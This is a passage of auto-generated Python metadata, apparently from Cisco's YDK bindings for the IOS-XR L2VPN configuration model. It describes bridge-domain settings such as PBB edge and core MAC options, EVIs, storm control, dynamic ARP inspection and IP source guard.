'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_edge_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-limit', REFERENCE_CLASS, 'PbbEdgeMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_edge_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac-secure', REFERENCE_CLASS, 'PbbEdgeMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure',
[], [],
''' MAC Secure
''',
'pbb_edge_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
False,
[
_MetaInfoClassMember('core-bd-name', ATTRIBUTE, 'str' , None, None,
[(0, 27)], [],
''' Core BD Name
''',
'core_bd_name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('isid', ATTRIBUTE, 'int' , None, None,
[('256', '16777214')], [],
''' ISID
''',
'isid',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('pbb-edge-dhcp-profile', REFERENCE_CLASS, 'PbbEdgeDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_edge_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_edge_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac', REFERENCE_CLASS, 'PbbEdgeMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
[], [],
''' MAC configuration commands
''',
'pbb_edge_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-static-mac-mappings', REFERENCE_CLASS, 'PbbStaticMacMappings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
[], [],
''' PBB Static Mac Address Mapping Table
''',
'pbb_static_mac_mappings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('unknown-unicast-bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Configure Unknown Unicast BMAC address
for PBB Edge Port
''',
'unknown_unicast_bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
False,
[
_MetaInfoClassMember('pbb-edge', REFERENCE_LIST, 'PbbEdge' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
[], [],
''' Configure BD as PBB Edge with ISID and
associated PBB Core BD
''',
'pbb_edge',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edges',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_core_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_core_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
False,
[
_MetaInfoClassMember('pbb-core-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_core_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'pbb_core_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_core_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging', REFERENCE_CLASS, 'PbbCoreMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_core_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_core_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit', REFERENCE_CLASS, 'PbbCoreMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_core_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
False,
[
_MetaInfoClassMember('pbb-core-evi', REFERENCE_LIST, 'PbbCoreEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
[], [],
''' PBB Core EVI
''',
'pbb_core_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain PBB Core
Configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-dhcp-profile', REFERENCE_CLASS, 'PbbCoreDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_core_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-evis', REFERENCE_CLASS, 'PbbCoreEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
[], [],
''' PBB Core EVI Table
''',
'pbb_core_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_core_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac', REFERENCE_CLASS, 'PbbCoreMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
[], [],
''' MAC configuration commands
''',
'pbb_core_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mmrp-flood-optimization', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling MMRP PBB-VPLS Flood Optimization
''',
'pbb_core_mmrp_flood_optimization',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-id', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' VLAN ID to push
''',
'vlan_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
False,
[
_MetaInfoClassMember('pbb-core', REFERENCE_CLASS, 'PbbCore' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
[], [],
''' PBB Core
''',
'pbb_core',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edges', REFERENCE_CLASS, 'PbbEdges' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
[], [],
''' PBB Edge
''',
'pbb_edges',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
False,
[
_MetaInfoClassMember('bridge-domain-evi', REFERENCE_LIST, 'BridgeDomainEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
[], [],
''' Bridge Domain EVI
''',
'bridge_domain_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic ARP Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Access Pseudowire Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai-address-validation', REFERENCE_CLASS, 'PseudowireDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
[], [],
''' Address Validation
''',
'pseudowire_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
False,
[
_MetaInfoClassMember('bdpw-storm-control-type', REFERENCE_LIST, 'BdpwStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
[], [],
''' Storm Control Type
''',
'bdpw_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
False,
[
_MetaInfoClassMember('bd-pw-static-mac-address', REFERENCE_LIST, 'BdPwStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'bd_pw_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic IP source guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
